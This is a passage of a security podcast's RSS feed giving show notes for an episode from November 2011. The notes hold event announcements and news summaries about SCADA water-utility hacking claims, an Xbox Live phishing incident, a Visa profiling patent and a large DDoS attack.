	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: 
	http://www.irongeek.com/i.php?page=videos/derbycon1/mccorkle-and-rios-100-bugs-in-100-days-an-analysis-of-ics-scada-software</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 530 &#8211; All Your DNA&#8230;, SCADA != Hacked, Amazon Shipping, Xbox Live Hacked?, Facebook Phone, Mega DDoS and SOPA FAQ!</title>
		<link>http://www.isdpodcast.com/episode-530-all-your-dna-scada-hacked-amazon-shipping-xbox-live-hacked-facebook-phone-mega-ddos-and-sopa-faq</link>
		<comments>http://www.isdpodcast.com/episode-530-all-your-dna-scada-hacked-amazon-shipping-xbox-live-hacked-facebook-phone-mega-ddos-and-sopa-faq#comments</comments>
		<pubDate>Thu, 24 Nov 2011 02:08:22 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3192</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 530 for November 23, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, Dr. Bonez, and Varun Sharma. Announcements: No Show on Thursday (11/24) or Friday (11/25). &#160; In order to allow our hosts to enjoy the Holiday and spend time with their families we will not have [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 530 for November 23, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, Dr. Bonez, and Varun Sharma.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">No Show on Thursday (11/24) or Friday (11/25). &nbsp;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In order to allow our hosts to enjoy the Holiday and spend time with their families we will not have any shows on Thursday (11/24) or Friday (11/25). &nbsp;Dr. Bonez will have his weekend show on 11/26 9PM EST. &nbsp;The normal show will return on 11/28.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes &amp; Dan Houser (@1cissp on twitter)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://moneyland.time.com/2011/10/27/now-credit-card-companies-want-your-dna/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://moneyland.time.com/2011/10/27/now-credit-card-companies-want-your-dna/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">All Your DNA Are Belong To Us</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;According to a Visa patent application published in April, the company sees potential to use a wide array of personal details to create profiles that could be used for ad targeting well beyond shopping details. It describes the possibility of also using &ldquo;information from social network websites, information from credit bureaus, information from search engines, information about insurance claims, information from DNA databanks,&rdquo; and other sources.&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">-thanks to Ciphersson for this story</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.allvoices.com/contributed-news/10935252-dhs-says-illinois-water-utility-wasnt-hacked"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.allvoices.com/contributed-news/10935252-dhs-says-illinois-water-utility-wasnt-hacked</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On Tuesday, the Department of Homeland Security said it could not confirm a report from an Illinois intelligence fusion center which stated that an Illinois water utility had been hacked. The DHS and FBI had been working with the Curran-Gardner Public Water District in Springfield, Ill.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Earlier, the Illinois Statewide Terrorism and Intelligence Center had reported an attack from a Russian IP address. The report said that by accessing a SCADA (supervisory control and data acquisition) system, the hackers had burned out a water pump at the facility.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The statement, by DHS spokesman Chris Ortman, said:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;After detailed analysis, DHS and the FBI have found no evidence of a cyber intrusion into the SCADA system of the Curran-Gardner Public Water District in Springfield, Illinois. There is no evidence to support claims made in initial reports&#8211;which were based on raw, unconfirmed data and subsequently leaked to the media&#8211;that any credentials were stolen, or that the vendor was involved in any malicious activity that led to a pump failure at the water plant. In addition, DHS and FBI have concluded that there was no malicious traffic from Russia or any foreign entities, as previously reported. Analysis of the incident is ongoing and additional relevant information will be released as it becomes available.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Authorities are now investigating a claim that a hacker broke into computers that run a South Houston, Texas water system. pr0f said he hacked into the system because he was dismayed that the DHS downplayed the Illinois incident. He later added that the Texas system had been protected with only a</span><a href="http://www.allvoices.com/contributed-news/10923069-hacked-scada-system-had-been-secured-with-only-a-three-character-password"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">three character password</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Joe Weiss, the security expert who first took note of the Illinois Statewide Terrorism and Intelligence Center report, titled, &quot;Public Water District Cyber Intrusion,&quot; was suspicious of the DHS&#39; conclusions. He said,</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;This smells to high holy heaven, because when you look at the Illinois report, nowhere was the word preliminary ever used. It was just laying out facts. How do the facts all of a sudden all fall apart?&rdquo;</span></p>
<p>	<a href="http://pastebin.com/wY6XD97L"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://pastebin.com/wY6XD97L</span></a><br />
	<a href="http://pastebin.com/TgRTgrAK"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://pastebin.com/TgRTgrAK</span></a><br />
	<a href="http://pastebin.com/HLNB6SAZ"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://pastebin.com/HLNB6SAZ</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://reviews.cnet.com/8301-18438_7-20024644-82/amazons-free-shipping-secret"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://reviews.cnet.com/8301-18438_7-20024644-82/amazons-free-shipping-secret</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Want free two-day shipping on Amazon but don&#39;t want to pay for it? Well, if you know the right person, you don&#39;t have to.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">That&#39;s right, last year around the holidays I offered up a little Amazon Prime tip for folks planning to do a lot of last-minute online shopping on Amazon.com. Now, with the holidays approaching again and a lot of people interested in the</span><a href="http://reviews.cnet.com/tablets/amazon-kindle-fire/4505-3126_7-35022491.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Kindle Fire</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, I thought I should update the story with some additional info.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Here&#39;s the deal. If you own or are considering purchasing an</span><a href="http://www.amazon.com/prime"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Amazon Prime</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> membership ($79 for the year), which enables you to get free two-day shipping on a whole host of items in Amazon&#39;s catalog, you can actually share your Prime membership with up to four &quot;household&quot; members. A lot of people don&#39;t know about this option because it&#39;s buried in the settings menu under &quot;Your Account.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To get there, just click on your &quot;Your Account&quot; (it&#39;s a little link in the top-right corner of your screen when you sign into Amazon). Look at the &quot;Settings&quot; section, and find &quot;Manage Prime Membership.&quot; Once you click on that, you&#39;ll be able to send invitations to folks you&#39;re close to. You just select your relationship, and enter an e-mail address and a birthday of the recipient to send out the invitation.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Of course, some people balk at paying $79 for Amazon Prime, but if you could share the cost with a roommate or just want to be a generous family member, it starts to look like one of the great bargains, especially if you use Amazon a lot. Also, if you&#39;re a student, you can pick up six months of Prime with</span><a href="http://www.amazon.com/gp/student/signup/info"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Amazon Student</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (just enter a .edu address to get your free six months).</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s worth mentioning that Amazon additionally has a program called</span><a href="http://www.amazon.com/gp/mom/signup/info"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Amazon Mom</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. As one reader pointed out in the comments section, the program, which is not gender specific (dads can use it as a primary caregiver), gives you three months of free Prime membership, and for every $25 you spend on &quot;baby&quot; items, you get another month free. Alas, Amazon Mom is currently </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">closed</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to new members (you can add your name to a wait list).</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;&nbsp;</span><a href="http://www.pcadvisor.co.uk/news/security/3320374/microsoft-denies-xbox-live-has-been-hacked"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcadvisor.co.uk/news/security/3320374/microsoft-denies-xbox-live-has-been-hacked</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft has denied that accounts belonging to Xbox Live users have been hacked.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Reports began surfacing this week that users of the online gaming service from Microsoft for the Xbox console were finding charges on their credit or debit cards for Microsoft Points, the currency used within the service. The purchases were for Microsoft Points, which allow Xbox Live users to buy extra games, add-ons and in-game items. It is thought the Microsoft Points that were obtained fraudulently had been used to buy extra content for a number of EA Sports games including FIFA 12, Madden and NBA.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This has lead to speculation that the tech giant had suffered at the hands of hackers, in the same way Sony did earlier this year, when the account details of 77 million users of the PlayStation Network were obtained by cybercriminals.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, Microsoft has denied this is the case and has instead blamed a phishing scam.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;In this case, a number of Xbox Live members appear to have recently been victim of malicious &#39;phishing&#39; scams (i.e. online attempts to acquire personal information such as passwords, user names and credit card details by purporting to be a legitimate company or person),&quot; Microsoft said.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;&nbsp;</span><a href="http://news.cnet.com/8301-30686_3-57329081-266/is-facebook-building-its-own-phone"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-30686_3-57329081-266/is-facebook-building-its-own-phone</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rumors of a &quot;Facebook phone&quot; are back in the news with a story from the technology Web site</span><a href="http://allthingsd.com/20111121/the-facebook-phone-its-finally-real-and-its-name-is-buffy/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">AllThingsD</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, which reports that the social-networking company is working with a cell phone manufacturer to build it.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The rumor of a Facebook phone, or a smartphone with deeply integrated Facebook social-networking tools in it, first emerged a little more than a year ago. Back then, CNET had confirmed the social network had reached out to hardware manufacturers and carriers seeking input on a Facebook-branded phone. But rumors faded as devices with Facebook buttons were announced this year. Now it looks like Facebook may have revised its plans to build its own phone.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On Monday, the AllThingsD Web site reported that Facebook is working with cell phone maker HTC to build a smartphone with the Facebook social-networking technology built into the core of the device. The new phone is code-named &quot;Buffy&quot; after the television show about a vampire slayer. The phone will be based on a modified version of Android, which has been tweaked by Facebook so that its services are deeply integrated, AllThingsD reported, citing unnamed sources.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.techworld.com/security/3320263/asian-company-hit-by-mega-ddos-attack"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.techworld.com/security/3320263/asian-company-hit-by-mega-ddos-attack</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DDoS criminals are trying to batter down DDoS defences with larger attacks and new techniques, mitigation outfit Prolexic has said, only weeks after the company detected a huge assault on an Asian company.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The attack on the unnamed organisation and its DNS provider happened between 5 and 12 November and reached 45Gbit/s at peak, equivalent to 69 million packets or 15,000 connections per second, way above the level that can be easily stemmed using standalone appliances, the company claimed.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The assault was sustained over nearly eight days in four different waves, focussing on the vulnerable application layers, a clear attempt to knock the business offline.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;This attack was three times larger in packets per second volume than the biggest attack Prolexic has mitigated previously,&shy;&shy;&shy; which also occurred in 2011&rdquo; said Prolexic CTO, Paul Sop.</span><br />
